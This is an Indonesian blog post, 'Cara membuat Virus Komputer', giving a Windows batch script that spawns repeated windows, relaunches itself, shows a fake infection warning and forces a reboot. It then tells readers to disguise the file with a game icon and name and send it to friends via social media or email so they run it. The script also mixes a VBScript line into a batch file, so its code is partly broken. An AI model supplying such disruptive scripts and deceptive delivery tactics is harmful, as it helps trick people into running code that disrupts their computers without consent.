Komputer dan sistem jaringan Komputer mikrotik microsoft office excel routeros routerboard cara mengatasi semua ada disini, mari berbagi

SISTEM JARINGAN KOMPUTER       L3 |  INFO TEKNOLOGI  |  NETWORKING  |  HARDWARE  |  SOFTWARE  |  MIKROTIK  |  TIP&TRIK KOMPUTER  |   CONTACT




Wednesday, April 20, 2016

Cara membuat Virus Komputer

Para sahabat Dunia maya, pengguna komputer merupakan aknum manusia yang paling Khawatir
Virus notepad
terhadap virus, pada dasarnya virus juga dibuat oleh manusia juga, karena itu separah apapun sebuah virus merusak system, pasti ada cara untuk menanggulanginya.
disini kami hanya ingin memaparkan sedikit script yang sering di sisipkan dalam script pembuatan virus, Tujuan utama sebenarnya hanya iseng mengisi kepenatan malam, kedua tidak ada salahnya memaparkan sedikit script yang dimiliki oleh banyak virus yang bertebaran didunia maya. 
hasilnya tidak membahayakan system namun orang awam yang belum faham tentang script baik yang di buat melaui notepad atau aplikasi yang lain mungkin akan memunculkan sedikit kekhawatiran terhadap komputernya.

pertama : 
Buka notepad dan ketikkan script berikut :
start
start
start
start
start
start
start
start 
X=MsgBox("Your system is bieng infected by virus. do you want to fix it ?",1+16,"icki virus")

@echo off
start game.bat
shutdown -r

Kedua :
simpan script tersebut dengan nama game.bat ( game dapat anda ganti dengan nama lain namun sesuaikan dengan nama yang kita tulis dalam script start game.bat, dan extensinya harus .bat )
ganti file type-nya menjadi all file

silahkan jalankan hasil penyimpanan yang berupa file bat tadi.

untuk mengusili teman anda ganti icon file bat tersebut dengan icon yang unik , semisal icon game, dan beri nama seperti nama game , kirimkan ke teman anda melalui media sosial seperti facebook, twitter atau e-mail dan sejenisnya, tampilan icon game bermaksud untuk menarik perhatian orang yang kita kirimi, sehingga mereka akan bersedia membuka dan menjalankan file tersebut. selamat mencoba dan selamat menemukan kegembiraan anda kembali.

Artikel Terkait

No comments:

Post a Comment